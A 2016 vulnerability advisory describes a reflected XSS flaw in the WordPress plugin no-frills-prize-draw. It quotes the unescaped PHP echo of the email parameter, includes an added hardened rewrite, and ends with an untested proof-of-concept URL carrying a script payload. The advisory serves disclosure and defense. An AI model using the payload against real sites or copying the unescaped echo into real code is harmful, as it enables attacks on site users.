Advisory #: 277
Title: Reflected XSS in wordpress plugin no-frills-prize-draw v1.1.1
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/no-frills-prize-draw
Downloads: 126
Vendor Notified: 2016-02-09
Vendor Contact: plugins@wordpress.org
Plugin Name: no-frills-prize-draw
Vulnerability:
There is a reflected XSS vulnerability in the following PHP code, at line 103 of ./no-frills-prize-draw/admin/nfpd-view-entrees-admin.php:

<form class='define' action="" method="get">Search by Email: <input type="text" name='email' value='<?php if(isset($_GET['email'])) echo $_GET['email'];?>' /><input type='hidden' name='page' value='nfpd_prize_draw_view_draw_entries'/> <?php if($realanswer!="") {?>Filter: <select id='filter' name='filter'><option value='0'>All</option><option value='1' <?php if(@$_GET['filter']=="1"){echo " selected";}?>>Only Correct Entries</option></select><?php } ?> <input type="submit" value='Refine results' class='button' /></form>

The email parameter appears to be echoed back to the user's browser unsanitized.
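A hardened rewrite of the line-103 form, added here as an example (it is not the plugin's own code and not part of the original advisory). It assumes the surrounding plugin code is unchanged and that $realanswer is set as in the original; the helper name nfpd_attr and the sample request values are assumptions.

```php
<?php
// Added example, not plugin code: every reflected value goes through nfpd_attr()
// before landing inside an HTML attribute. ENT_QUOTES matters here because the
// value attribute is delimited with single quotes; before PHP 8.1 the default
// flag set (ENT_COMPAT) escaped only double quotes, so a single-quoted attribute
// would remain breakable even with a plain htmlspecialchars() call.
function nfpd_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample request standing in for a live $_GET (assumption).
$_GET = [
    'email'  => "o'brien <test@example.com>",
    'filter' => '1',
    'page'   => 'nfpd_prize_draw_view_draw_entries',
];
$realanswer = 'placeholder'; // assumption: set by the surrounding plugin code

$email = isset($_GET['email']) ? (string) $_GET['email'] : '';
// The filter value is only ever compared, never echoed; reducing it to '0'/'1'
// keeps the comparison exact and avoids the original's @-suppressed lookup.
$filter = (isset($_GET['filter']) && $_GET['filter'] === '1') ? '1' : '0';
?>
<form class='define' action="" method="get">Search by Email:
<input type="text" name='email' value='<?php echo nfpd_attr($email); ?>' />
<input type='hidden' name='page' value='nfpd_prize_draw_view_draw_entries'/>
<?php if ($realanswer != "") { ?>Filter: <select id='filter' name='filter'>
<option value='0'<?php if ($filter === '0') { echo ' selected'; } ?>>All</option>
<option value='1'<?php if ($filter === '1') { echo ' selected'; } ?>>Only Correct Entries</option>
</select><?php } ?>
<input type="submit" value='Refine results' class='button' /></form>
```

With the sample request, the rendered value attribute becomes value='o&#039;brien &lt;test@example.com&gt;', so the single quote and angle brackets stay inside the attribute as data.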
CVE-ID: Not Released
File:./no-frills-prize-draw/admin/nfpd-view-entrees-admin.php
Exploit Code:
The exploit was derived from the first appearance of a vulnerable parameter in the code; there could be more than the one shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/no-frills-prize-draw/admin/nfpd-view-entrees-admin.php?email="><script>alert(1);</script><"